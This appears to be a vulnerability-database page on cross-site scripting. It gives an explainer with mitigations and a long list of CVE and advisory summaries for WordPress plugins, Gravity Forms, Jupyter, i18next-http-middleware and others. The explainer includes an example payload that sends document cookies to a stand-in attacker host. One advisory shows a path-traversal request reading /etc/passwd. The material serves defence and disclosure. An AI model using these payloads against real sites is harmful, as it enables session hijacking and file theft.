Cross-Site Scripting
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
How It Works
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.
The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.
A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.
Impact
- Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
- Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
- Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
- Keylogging: Monitor and exfiltrate everything users type on the compromised page
- Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
- Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests
Real-World Examples
A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.
eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.
British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.
Mitigation
- Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
- Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
- HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
- Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
- DOM-based XSS prevention: Use safe APIs like
textContentinstead ofinnerHTML; avoid passing user data to dangerous sinks likeeval()
Recent CVEs (38830)
Reflected cross-site scripting in Zingaya Click-to-Call WordPress plugin up to version 1.0 allows unauthenticated attackers to inject arbitrary web scripts via the email, first_name, last_name, and phone parameters on the plugin's admin sign-up page. The vulnerability requires user interaction (clicking a malicious link) and results in session hijacking, credential theft, or defacement within the WordPress admin context. No public exploit code or active exploitation has been identified at the time of analysis.
Stored cross-site scripting in Charts Ninja: Create Beautiful Graphs & Charts plugin for WordPress (all versions up to 2.1.0) allows authenticated contributors and above to inject arbitrary JavaScript via the 'chartid' shortcode attribute due to insufficient input sanitization and output escaping. Injected scripts execute in the context of any user viewing the affected page, potentially compromising site visitors and administrative accounts. No public exploit code or active exploitation has been confirmed at this time.
Stored Cross Site Scripting in ERPNext v15.103.1 and earlier allows users with email template creation or editing permissions to inject malicious JavaScript that executes in victims' browsers when the template is applied, affecting confidentiality and integrity with a low EPSS score of 0.02% suggesting minimal real-world exploitation despite the moderate CVSS score of 6.1.
Reflected cross-site scripting (XSS) in FluentCMS 1.2.3 TextHTML plugin allows unauthenticated remote attackers to inject malicious scripts into web pages viewed by other users via specially crafted requests. The vulnerability requires user interaction (clicking a malicious link) and affects confidentiality and integrity with a CVSS score of 6.1, but is not currently exploited in the wild and carries negligible exploitation probability per EPSS.
ISPConfig 3.3.0 allows reflected cross-site scripting (XSS) attacks via the system status webpage, enabling unauthenticated remote attackers to inject malicious scripts that execute in a victim's browser when they visit a crafted link. The vulnerability requires user interaction (clicking a malicious link) but can result in session hijacking, credential theft, or other client-side attacks. A patched version (3.3.0p2) has been released.
Unauthenticated users can upload SVG files containing XSS payloads via POST /api/files/upload in Dify prior to version 1.13.1, allowing cross-site scripting attacks against application users. The authenticated endpoint POST /v1/files/upload is similarly vulnerable. This vulnerability enables attackers to execute arbitrary JavaScript in the context of victim browsers, potentially compromising user sessions or stealing sensitive data without requiring any authentication or user interaction.
Self-XSS in OpenC3 COSMOS Command Sender UI prior to version 7.0.0 allows authenticated users to execute arbitrary JavaScript in their own browser session via unsafe eval() processing of array parameters. An attacker can exploit this through phishing or by convincing a victim to send a malicious command, potentially stealing session tokens or modifying authenticated data. Patch available in version 7.0.0.
Remote code execution in Notesnook Desktop (Electron-based) via stored XSS in the note export-to-PDF flow allows unauthenticated remote attackers to execute arbitrary code when a user opens a maliciously crafted note. The vulnerability stems from unescaped HTML in exported note fields (title, headline, content) that execute in an Electron iframe with nodeIntegration enabled and contextIsolation disabled, escalating browser-based XSS to full RCE. Affects Notesnook Web/Desktop <3.3.15 and iOS/Android <3.3.20. CVSS 9.6 with changed scope (S:C) reflects privilege escalation from browser context to system-level code execution. EPSS and KEV data not provided, but requires user interaction (UI:R) to export/view the malicious note, limiting automated exploitation.
Remote code execution via reflected XSS in Tegsoft Online Support Application V3 through build 31122025 allows unauthenticated attackers to execute arbitrary JavaScript in victim browsers with full application privileges. Despite being classified as CWE-79 (XSS), the CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H indicates critical impact typically reserved for RCE vulnerabilities, suggesting severe exploitation potential beyond typical XSS. Reported by TR-CERT (Turkish national CERT) with advisory published at USOM, indicating regional significance. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis.
Reflected cross-site scripting in GeoVision LPC2011/LPC2211 Web Interface enables remote attackers to execute arbitrary JavaScript in victim browsers via crafted URLs targeting the ssi.cgi error handler. The vulnerability chains through social engineering (requires user interaction) but achieves high confidentiality impact through changed scope (S:C), allowing session hijacking and credential theft from authenticated administrators. EPSS data not provided; no CISA KEV listing indicates this is not yet confirmed as actively exploited in the wild. Publicly available exploit code status unknown but detailed technical disclosure exists from Cisco Talos Intelligence.
Reflected cross-site scripting in GeoVision LPC2011/LPC2211 1.10 web interface (ssi.cgi) allows remote unauthenticated attackers to execute arbitrary JavaScript in victim browsers via crafted URLs. The vulnerability achieves scope change (S:C in CVSS), enabling access to high-confidentiality data across security contexts despite requiring user interaction. No public exploit code or CISA KEV listing identified at time of analysis, though vendor advisory confirms the flaw. EPSS data not available. The RCE tag appears to be a mislabeling - this is strictly client-side JavaScript execution (XSS), not server-side remote code execution.
Stored cross-site scripting in Pluck CMS before v4.7.21dev allows authenticated high-privilege users to inject arbitrary JavaScript via the page editor, escalating privileges through the sanitizePageContent function in editpage.php. The vulnerability requires attacker authentication with administrative role and user interaction (UI:R), limiting spontaneous exploitation but enabling privilege escalation attacks within compromised admin accounts.
Stored cross-site scripting (XSS) in wCMS v.1.4 allows remote attackers to inject malicious scripts when creating new blog entries, which are executed in the browsers of other users who view the affected blog. The vulnerability requires user interaction (victim visiting the compromised blog) and affects site confidentiality and integrity. No public exploit code or active exploitation has been confirmed at the time of analysis.
Stored Cross-Site Scripting in NEX-Forms WordPress plugin versions ≤9.1.11 allows unauthenticated remote attackers to inject malicious JavaScript through crafted POST parameter key names during form submission. Exploitation requires no authentication (CVSS PR:N) and persists across page loads, affecting any user viewing injected content. The CVSS vector indicates changed scope (S:C), meaning attackers can impact resources beyond the vulnerable component's security scope. No active exploitation confirmed via CISA KEV at time of analysis, but WordPress XSS vulnerabilities typically see rapid weaponization once disclosed.
Stored cross-site scripting (XSS) in kerwincui FastBee up to version 1.2.1 allows authenticated remote attackers to inject malicious scripts via the noticeContent parameter in the System Notice Handler component, which are then executed in the browsers of other users viewing notices. The vulnerability requires user interaction (victims must view the injected notice) and authenticated access, limiting immediate attack scope, though publicly available exploit code and vendor non-responsiveness increase real-world risk.
Stored cross-site scripting in NextMove Lite - Thank You Page for WooCommerce plugin allows authenticated attackers with contributor-level access to inject arbitrary JavaScript via the 'xlwcty_current_date' shortcode due to insufficient input sanitization and output escaping. Injected scripts execute in the browser of any user viewing affected pages, potentially compromising WordPress site integrity and user sessions. No public exploit code or active exploitation has been confirmed at the time of analysis.
Stored Cross-Site Scripting (XSS) in Quiz Maker by AYS WordPress plugin versions up to 6.7.1.29 allows unauthenticated attackers to inject arbitrary JavaScript through the 'rate_reason' parameter due to insufficient input sanitization and output escaping. Injected scripts execute in the browsers of all users who view affected pages, enabling credential theft, malware distribution, or defacement without requiring authentication or user interaction.
Stored Cross-Site Scripting in Premium Addons for Elementor plugin for WordPress up to version 4.11.70 allows authenticated attackers with contributor-level or higher privileges to inject arbitrary JavaScript via the 'custom_svg' parameter, which executes in the browsers of users viewing the affected pages. The vulnerability stems from insufficient input sanitization and output escaping on a user-controllable SVG parameter. No public exploit code or active exploitation has been identified at the time of analysis.
Stored Cross-Site Scripting in Total WordPress theme versions up to 2.2.1 allows authenticated contributors and above to inject arbitrary JavaScript via post titles in the home blog section. The vulnerability stems from insufficient output escaping when rendering post titles in HTML attribute context. Exploitation requires the malicious post to be published and displayed with a featured image on the home page, where the injected script will execute in the browsers of all users viewing the page. No public exploit code has been identified, and active exploitation has not been confirmed.
Unauthenticated attackers can inject stored cross-site scripting payloads into Brizy Page Builder for WordPress (versions ≤2.8.11) via form submission FileUpload fields, which execute when administrators view the form Leads page. The vulnerability chains three implementation flaws: missing nonce verification for anonymous form submissions, inadequate sanitization of FileUpload field values when no file is attached, and reversal of HTML entity encoding via html_entity_decode() before unescaped output in admin views. Publicly available exploit code exists. EPSS data not provided, but the CVSS 7.2 (High) with scope change reflects the privilege escalation from unauthenticated user to admin-context execution. Patch released in version 2.8.12 per WordPress plugin repository changeset 3502206.
Stored cross-site scripting (XSS) in Gravity Forms WordPress plugin versions ≤2.10.0 allows remote unauthenticated attackers to inject malicious JavaScript that executes when administrators view form entries. The vulnerability exploits a validation bypass in nested SingleProduct fields within Repeater fields, where product name tampering is not validated. When admins access compromised entries via wp-admin, the unsanitized payload executes in their browser session. CVSS 7.2 (AV:N/AC:L/PR:N/UI:N) indicates network-accessible exploitation without authentication or user interaction during payload delivery, though the attack requires subsequent admin interaction (viewing the entry) for payload execution. No active exploitation confirmed in CISA KEV at time of analysis.
Stored Cross-Site Scripting in Gravity Forms plugin for WordPress through version 2.10.0 allows unauthenticated remote attackers to inject malicious scripts via Hidden Product fields nested in Repeater fields. The vulnerability executes when WordPress administrators view submitted form entries. Attack succeeds because repeater subfields bypass validation, and the Hidden Product field's validate() method checks only quantity while ignoring the product name field, which renders unescaped in entry details. CVSS 7.2 with changed scope indicates potential cross-user impact. EPSS and KEV data not provided; exploitation requires no authentication or user interaction (AV:N/PR:N/UI:N), making this exploitable against any public-facing Gravity Forms installation accepting submissions.
Stored Cross-Site Scripting in Call for Price for WooCommerce plugin versions up to 4.2.0 allows authenticated administrators to inject arbitrary JavaScript via plugin settings that executes for all users visiting affected pages. The vulnerability requires administrator-level access and is limited to WordPress multisite installations or single-site installations with the unfiltered_html capability disabled, significantly reducing real-world exposure compared to the CVSS score of 4.4 suggests.
Stored XSS in Gravity Forms for WordPress ≤2.10.0 allows unauthenticated remote attackers to inject malicious JavaScript through Product Option field values that execute when administrators view entry details. The flaw exploits a sanitization bypass: the plugin's state validation accepts values matching wp_kses()-cleaned legitimate options but stores the raw unsanitized input, which is then rendered without escaping in the Order Summary view (view-order-summary.php:32). EPSS data not available; no public exploit identified at time of analysis. Vendor patch status requires verification via changelog.
Stored Cross-Site Scripting in Gravity Forms for WordPress up to 2.10.0 enables unauthenticated attackers to inject malicious scripts through form submissions containing crafted Calculation Product field names within Repeater fields. When administrators view entry details in wp-admin, the unescaped product names execute arbitrary JavaScript in the admin context. CVSS 7.2 (AV:N/AC:L/PR:N/UI:N/S:C) indicates network-accessible exploitation without authentication, though actual impact requires admin interaction. EPSS and KEV data not provided; no public exploit code confirmed at time of analysis. Wordfence reported this vulnerability affecting the Calculation Product field validation and rendering chain.
Stored Cross-Site Scripting in Gravity Forms plugin for WordPress allows unauthenticated remote attackers to inject malicious JavaScript into form entries that executes when administrators view the Entries List page. The vulnerability exploits a flawed dual-hash state validation mechanism that fails to prevent sanitized-then-restored XSS payloads in Consent field hidden inputs. Gravity Forms versions up to 2.10.0 are affected. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis, but Wordfence threat intelligence disclosure indicates vendor awareness and patching activity.
Stored cross-site scripting in Jeg Kit for Elementor WordPress plugin versions up to 3.1.0 allows authenticated contributors and above to inject arbitrary JavaScript via the 'sg_content_number_prefix' parameter, which executes when any user accesses the affected page. The vulnerability stems from insufficient input sanitization and output escaping in the Fun Fact widget element, affecting any WordPress site using this popular page builder addon. CVSS score of 6.4 reflects the network attack vector and broad scope, though exploitation requires valid contributor-level credentials.
Stored Cross-Site Scripting in Essential Blocks WordPress plugin versions up to 6.0.4 allows authenticated Contributor-level users to inject arbitrary JavaScript into the Add to Cart block via unescaped className, classHook, and blockId attributes, executing malicious scripts in pages viewed by any site visitor. The vulnerability stems from use of raw sprintf() and implode() functions without WordPress escaping functions (esc_attr) in the render_callback() function, despite the outer wrapper using proper escaping. CVSS 6.4 (medium) reflects the requirement for authenticated access; however, the stored nature and cross-site scope elevate real-world risk on multi-author WordPress sites.
Stored Cross-Site Scripting in Simple Link Directory plugin for WordPress up to version 8.9.2 allows authenticated contributors and above to inject arbitrary JavaScript through insufficiently sanitized shortcode attributes like `title_font_size`, which executes in the browsers of all users accessing affected pages. The vulnerability affects the `qcopd-directory` shortcode and requires contributor-level WordPress access to exploit, making it a moderate-to-high risk for multi-author WordPress sites without strict role management.
Stored cross-site scripting in Maxi Blocks plugin for WordPress versions up to 2.1.9 allows authenticated attackers with Author-level access and above to inject arbitrary JavaScript via the `/wp-json/maxi-blocks/v1.0/style-card` REST API endpoint through insufficient sanitization of the `sc_styles` parameter. Injected scripts execute on every page where style card styles are loaded, including the WordPress admin panel, affecting all website visitors and administrators. The vendor released patched version 2.1.10 on 27 April 2026 with input sanitization fixes (wp_strip_all_tags applied to sc_styles parameter) and privilege escalation mitigation in the image crop functionality.
Cross-site scripting (XSS) vulnerability in nextlevelbuilder ui-ux-pro-max-skill up to version 2.5.0 allows remote attackers to inject malicious scripts via unescaped user input in the Slide Generator component's data.get() function. The vulnerability affects slide generation where user-supplied content (titles, subtitles, company names, feature descriptions) is embedded directly into HTML output without sanitization. Publicly available exploit code exists, and the vendor has released a patch via pull request, though the project has not actively responded to security notifications. CVSS score of 2.1 reflects low severity due to required user interaction, but the public availability of exploit code increases practical exploitation risk.
Reflected cross-site scripting (XSS) in GSVoIP web panel version 2.0.90 allows remote attackers to inject arbitrary JavaScript via the `msg` parameter in the `/painel/gateways.php/error` endpoint. The vulnerability requires user interaction (clicking a malicious link) but can lead to session hijacking, credential theft, or malware distribution. No authentication is required, and public exploit code exists.
Stored cross-site scripting (XSS) in @diplodoc/search-extension versions 1.0.0 through 3.0.2 allows authenticated users to inject malicious scripts via the title field in Markdown files, which are then executed in the browsers of other users viewing the affected documentation. The vulnerability requires user interaction (rendered content must be viewed) and affects the confidentiality and integrity of affected systems. Vendor-released patch: version 3.0.3.
Multiple plugins and/or themes for WordPress are vulnerable to Reflected Cross-Site Scripting via the url parameter in various versions due to insufficient input sanitization and output escaping. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.
Stored cross-site scripting in Elementor Website Builder plugin for WordPress up to version 4.0.4 allows authenticated contributors to inject arbitrary JavaScript via form-encoded REST API requests to the _elementor_data meta field. The vulnerability bypasses sanitization by exploiting a json_decode() failure on non-JSON request bodies, causing unsanitized data to be stored and later output without escaping in widget rendering functions. Contributors and above can inject malicious scripts that execute for all users viewing affected pages, compromising site integrity and user sessions.
Stored cross-site scripting in V2Board through version 1.7.4 allows authenticated administrators to inject arbitrary JavaScript into the custom_html theme configuration field via the saveThemeConfig API, which is rendered unescaped in the dashboard.blade.php template and executed in the browsers of all site visitors, enabling cookie theft, session hijacking, and phishing attacks.
Stored cross-site scripting in IBM Langflow Desktop 1.6.0 through 1.8.4 allows authenticated users to inject arbitrary JavaScript code into the Web UI, potentially altering application functionality and disclosing session credentials to other users of the same instance. The vulnerability requires valid authentication but no user interaction from the target, affecting confidentiality and integrity of the application.
Stored cross-site scripting (XSS) in LinkStack up to version 4.8.6 allows authenticated users to inject malicious scripts via the pageDescription parameter in the editPage function, which are then stored and executed in the browsers of users viewing the affected page. The vulnerability requires user interaction (victim must view the page) and authenticated access, limiting its scope to authenticated attackers, but publicly available exploit code exists and the vendor has provided a fix via pull request #974.
Reflected cross-site scripting in SSCMS v7.4.0 allows authenticated attackers to inject arbitrary JavaScript through crafted STL template payloads in the /api/stl/actions/dynamic endpoint. The vulnerability arises from improper output encoding when decrypted STL templates are returned in JSON responses, enabling session hijacking, credential theft via phishing, and unauthorized user actions. User interaction is required to trigger the payload, limiting but not eliminating real-world risk.
Stored XSS in Jupyter Notebook's CommandLinker feature enables authentication token theft through malicious notebook files, leading to complete account takeover. Attackers craft notebook files with disguised controls that, when clicked once by victims, execute arbitrary code via the Jupyter REST API, granting full filesystem access and kernel control. Reported by NVIDIA AI Red Team. Vendor-released patches available: Jupyter Notebook 7.5.6 and JupyterLab 4.5.7. No public exploit code identified at time of analysis, but proof-of-concept demonstrated internally by NVIDIA researchers. This vulnerability targets data science and ML engineering environments where notebook sharing is common practice.
DOM-based cross-site scripting in LEX Baza Dokumentów through version 1.3.3 allows attackers to execute arbitrary JavaScript in victim browsers via unsafe processing of the 'em' cookie parameter on the client side. Exploitation requires local access and user interaction, and the attacker must have the ability to set a cookie, significantly limiting real-world attack surface. The vendor has released patch version 1.3.4 to address this vulnerability.
Cross-site scripting (XSS) vulnerability in andrewtch88 mvc-ecommerce v.1.0 allows remote attackers to execute arbitrary JavaScript in victim browsers and exfiltrate sensitive information through the product_catalogue.php component. The vulnerability requires user interaction (clicking a malicious link or visiting a compromised page) but affects all users due to stored or reflected XSS impact across site sessions. CVSS 6.1 reflects moderate risk with network-based attack vector and low complexity, though no active exploitation in CISA KEV has been confirmed at time of analysis.
Stored cross-site scripting (XSS) in JeeSite v5.15.1 allows unauthenticated remote attackers to inject arbitrary web scripts or HTML via the msgContent parameter in the /msg/msgInner/save endpoint, affecting any user who views a message containing the malicious payload. The vulnerability requires user interaction (viewing the crafted message) but can impact confidentiality and integrity of user sessions through script execution in the victim's browser context. No public exploit code or active exploitation has been confirmed at this time.
Stored cross-site scripting (XSS) in SpringBlade v4.8.0 allows unauthenticated remote attackers to inject arbitrary web scripts or HTML via the /api/blade-desk/notice/submit endpoint's content parameter, executing malicious code in the browsers of subsequent users who view the injected notice. The vulnerability requires user interaction (viewing the stored payload) to trigger, affecting the confidentiality and integrity of affected applications. No public exploit code or active exploitation has been confirmed at the time of analysis.
Cross-site scripting (XSS) in RafyMrX TOKO-ONLINE-ROTI v.1.0 allows remote attackers to execute arbitrary JavaScript in a victim's browser via the detail_produk.php component when a user visits a malicious link. The vulnerability requires user interaction (clicking a link) and affects confidentiality and integrity with a CVSS score of 6.1. No active exploitation has been confirmed in CISA KEV, but a proof-of-concept payload exists in public repositories.
Authenticated cross-site scripting (XSS) vulnerabilities in Shopizer v3.2.5's XssHttpServletRequestWrapper class allow authenticated attackers to execute arbitrary web scripts or HTML by injecting crafted payloads into the getInputStream() or getReader() functions. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting exploitation to logged-in users who can be socially engineered into clicking malicious links or submitting forms. No public exploit code or active exploitation has been confirmed at time of analysis.
### Summary Versions of `i18next-http-middleware` prior to 3.9.3 pass the user-controlled `lng` and `ns` values from `getResourcesHandler` directly into `i18next.services.backendConnector.load(languages, namespaces, …)` without any sanitisation. Depending on which backend is configured, the unvalidated path segments enable one of two attacks: - **Filesystem path traversal** when the middleware is paired with `i18next-fs-backend` (or any backend that interpolates `lng` / `ns` into a filesystem path). - **Server-Side Request Forgery (SSRF)** when the middleware is paired with `i18next-http-backend` (or any backend that interpolates into an HTTP URL). Example request: ``` GET /locales/resources.json?lng=../../etc/passwd&ns=root ``` with `i18next-fs-backend` reads the attacker-chosen file from disk; with `i18next-http-backend` reshapes the outgoing URL to target an internal service. ### Impact - **Arbitrary file read** via `fs`-style backends - any file the Node process can read becomes reachable (source, configuration, `.ssh` keys, `.env`, Docker secrets, etc.). - **SSRF** via `http`-style backends - requests to internal IPs / hostnames not normally reachable from the internet; combined with cloud metadata endpoints this can escalate to credential theft. - **Unbounded growth of `i18next.options.ns`** - a now-incidental amplification: the pre-patch `getResourcesHandler` pushed every unique `ns` value into the shared `i18next.options.ns` singleton array without validation or bounds, enabling memory exhaustion from repeated unique payloads. The severity is bounded by the backend in place, but the middleware itself exposed the unsanitised path; this is the "weakest link" layer. ### Affected versions `< 3.9.3`. ### Patch Fixed in **3.9.3**. The patch introduces `utils.isSafeIdentifier` and applies it in `getResourcesHandler` before `lng` and `ns` reach the backend connector: ```js languages = languages.filter(utils.isSafeIdentifier) namespaces = namespaces.filter(utils.isSafeIdentifier) ``` `isSafeIdentifier` uses a denylist approach - it still accepts any legitimate i18next language-code shape ([i18next FAQ](https://www.i18next.com/how-to/faq#how-should-the-language-codes-be-formatted)) - rejecting: - `..` sequences (relative path traversal) - path separators (`/`, `\`) - control characters (C0/C1) - prototype keys (`__proto__` / `constructor` / `prototype`) - empty strings and values longer than 128 characters Unsafe values are dropped; only safe values reach the backend. The fix is a defence-in-depth layer on top of any sanitisation the backend itself may apply. ### Workarounds No workaround short of upgrading. Front-proxying the middleware with a WAF rule that rejects requests containing `..`, `/`, `\`, or URL-structure characters in `lng` / `ns` is a partial mitigation. Upgrading the configured backend (`i18next-fs-backend` ≥ 2.6.4, `i18next-http-backend` ≥ 3.0.5) also closes the same attack at the next layer. ### Related advisories fixed in the same release - [GHSA-5fgg-jcpf-8jjw](https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw) - prototype pollution via `setPath` and `missingKeyHandler`. Independently fixable, filed separately per CNA rules. - [GHSA-c3h8-g69v-pjrg](https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-c3h8-g69v-pjrg) - HTTP response splitting + XSS-filter bypass (CVE-2026-41683). ### Credits Discovered via an internal security audit of the i18next ecosystem. ### Resources - [CWE-22: Path Traversal](https://cwe.mitre.org/data/definitions/22.html) - [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html) (specific sub-case when paired with an HTTP backend) - [i18next FAQ: language code formatting](https://www.i18next.com/how-to/faq#how-should-the-language-codes-be-formatted)
Reflected cross-site scripting (XSS) in Admidio's msg_window.php endpoint allows unauthenticated attackers to execute arbitrary JavaScript in any user's browser by exploiting incomplete output encoding. The vulnerability chains htmlspecialchars() (which does not encode square brackets) with a subsequent Language::prepareTextPlaceholders() call that converts brackets to angle brackets, producing executable HTML markup. Publicly available proof-of-concept demonstrates the attack requires only victim click (no authentication), and Admidio sets no Content-Security-Policy headers to block inline script execution.
Reflected cross-site scripting (XSS) in Icinga Web's ipl-web library (composer package ipl/web) allows remote attackers to execute arbitrary JavaScript in victim browsers via malformed search requests. Affects all versions ≤0.13.0. Fixed in ipl/web 0.13.1 (bundled in icinga-php-library 0.19.2). Requires high-privilege authenticated attacker and victim user interaction via social engineering. No active exploitation confirmed by CISA KEV. CVSS 7.7 reflects scope change (cross-user impact) despite complex attack prerequisites.
CKAN versions 2.10.0 through 2.10.9 and 2.11.0 through 2.11.4 allow unauthenticated requests to permanently disable CSRF protection on endpoints for the lifetime of the server process by triggering a state mutation in the flask-wtf CSRFProtect middleware. Combined with cross-site scripting, an attacker can exploit this to perform authenticated actions using other users' credentials. The vulnerability affects network-accessible CKAN instances with default configurations and has CVSS 6.1 with user interaction required.
MyBB Recent threads 17.0 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts by creating threads with crafted subject lines. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
A vulnerability was detected in SourceCodester CET Automated Grading System with AI Predictive Analytics 1.0. This vulnerability affects unknown code of the file /index.php?action=register of the component Registration. The manipulation of the argument student_id/full_name/section/username results in cross site scripting. The attack can be launched remotely. The exploit is now public and may be used.
During code logic analyis, an area that may lead to unintended behavior under specific conditions was discovered. ## Overview - Verified Version: `80cd21554124da07d17a4f962c7d770a4f70d0f2` - Vulnerability Type: Stored XSS - Affected Location: `beetsplug/web/templates/index.html:42` - Trigger Scenario: Metadata fields such as `title`, `lyrics`, or `comments` are rendered with raw template interpolation and inserted into DOM via `.html(...)`. ## Root Cause The bundled web UI uses Underscore template interpolation mode `<%= ... %>` for untrusted metadata fields. In this runtime, `<%= ... %>` is raw insertion and HTML escaping is only performed by `<%- ... %>`. Rendered output is then inserted with `.html(...)`, allowing attacker-controlled markup to become active DOM. ## Source-to-Sink Chain 1. Source (attacker-controlled input) - Item metadata values (for example `title`, `lyrics`, `comments`) can contain attacker HTML payload. 2. Data flow - Templates in `beetsplug/web/templates/index.html:42-46,87-91` render metadata with `<%= ... %>`. - Underscore runtime defines `<%= ... %>` as raw interpolation (`beetsplug/web/static/underscore.js:890-907`). 3. Sink (security-sensitive action) - Frontend inserts rendered template output into DOM via `$(this.el).html(this.template(this.model.toJSON()));` in `beetsplug/web/static/beets.js:182,208,220`. ## Exploitation Preconditions 1. Victim opens the web UI page that renders attacker-controlled metadata. 2. Metadata includes executable HTML/JS payload. ## Risk Stored payload executes in the web UI context and can perform actions available to that origin. ## Impact Attacker can run arbitrary JavaScript in the victim browser, exfiltrate viewable data, and perform UI-driven actions as the victim session. ## Remediation 1. Replace raw interpolation `<%= ... %>` with escaped output `<%- ... %>` for untrusted fields. 2. Avoid `.html(...)` for untrusted template output; use text-safe rendering. 3. Sanitize metadata values on ingest and before rendering, including attribute contexts.
A vulnerability was detected in SourceCodester Pharmacy Sales and Inventory System 1.0. The impacted element is the function Customer of the file /index.php?page=customer. The manipulation of the argument Name results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used.
Helpy contains a stored cross-site scripting vulnerability in the knowledge base Doc rendering logic. An authenticated attacker with admin or agent editor privileges can persist arbitrary HTML or JavaScript in the body field of a knowledge base Doc.This issue affects helpy: 2.8.0.
Helpy contains a stored cross-site scripting vulnerability in the post author display logic. Any registered user can persist arbitrary HTML in their account name field and cause it to be rendered unescaped in public forum threads where they participate, in the admin ticket view, and in HTML notification emails sent to other users.This issue affects helpy: 2.8.0.
A stored cross-site scripting (XSS) vulnerability in opennebula v6.10.0.1 and fixed in v.7.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the virtual network template parameter.
A stored cross-site scripting (XSS) vulnerability in opennebula v6.10.0.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the user information parameter.
A cross-site scripting (XSS) vulnerability in opennebula v6.10.0.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the zone attribute parameter.
A cross-site scripting (XSS) vulnerability in the custom authenticator driver of opennebula v6.10.0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
Jenkins HTML Publisher Plugin 427 and earlier does not escape job name and URL in the legacy wrapper file, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.
Jenkins GitHub Plugin 1.46.0 and earlier improperly processes the current job URL as part of JavaScript implementing validation of the feature "GitHub hook trigger for GITScm polling", resulting in a stored cross-site scripting (XSS) vulnerability exploitable by non-anonymous attackers with Overall/Read permission.
The WP Meteor Website Speed Optimization Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'frontend_rewrite' function's 'WPMETEOR[N]WPMETEOR' placeholder content in all versions up to, and including, 3.4.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP Image Widget image-widget allows Stored XSS.This issue affects Image Widget: from n/a through <= 4.4.11.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpeverest User Registration user-registration allows Reflected XSS.This issue affects User Registration: from n/a through <= 5.1.5.
The authentication endpoint accepts user-supplied input without enforcing expected validation constraints, leading to a lack of proper output encoding. This allows for the injection of malicious JavaScript payloads, enabling reflected cross-site scripting. An attacker can leverage this vulnerability to redirect the user's browser to a malicious website, modify the user interface of the web page, retrieve information from the browser, or cause other harmful actions. However, due to the protection of session-related cookies with the httpOnly flag, session hijacking is not possible.
GCHQ CyberChef before 11.0.0 allows XSS via Show Base64 offsets, as demonstrated by the /#recipe=Show_Base64_offsets('%3Cscript substring.
